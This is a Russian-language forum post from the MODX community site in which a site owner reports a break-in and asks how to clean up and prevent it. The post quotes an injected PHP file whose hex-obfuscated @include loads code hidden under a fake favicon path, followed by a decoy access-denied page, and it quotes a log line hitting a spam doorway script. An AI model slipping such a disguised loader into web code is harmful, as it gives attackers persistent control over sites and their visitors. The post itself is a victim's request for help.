Кузнец Максимов

Кузнец Максимов

С нами с 22 июля 2018; Место в рейтинге пользователей: #2008

Взлом сайта

Добрый день.
Сегодня зарегистрировали взлом сайта. При поиске по серверу были обнаружены следующие файлы:
/core/lexicon/index.php
с таким содержимым:
<?php
/*93a2a*/

@include "\x2fva\x72/w\x77w/\x75se\x726/\x64at\x61/w\x77w/\x64iz\x61in\x76ol\x6fs.\x72u/\x63or\x65/m\x6fde\x6c/a\x77s/\x66av\x69co\x6e_e\x39e6\x35a.\x69co";

/*93a2a*/


echo file_get_contents('index.html.bak.bak');
И рядышком файл
index.html.bak.bak
с таким содержимым:
<h2>Unauthorized access</h2>
You're not allowed to access file folder
В логах много таких записей:
«GET /site/emvkdb.php?nuxk=2011-nissan-gtr-for-sale HTTP/1.0» 200 4080 "-" «Mozilla/5.0 (compatible; MJ12bot/v1.4.7; mj12bot.com/
Конструкция из файла index.php обнаружена в нескольких файлах, с разными символами, но принцип один и тот же. Скажите, была и ли кого-то такая проблема и как ее решали? Ну и в целом как обезопасить себя от подобных неприятностей?
Андрей
29 декабря 2017, 08:42
modx.pro
2
4 766
0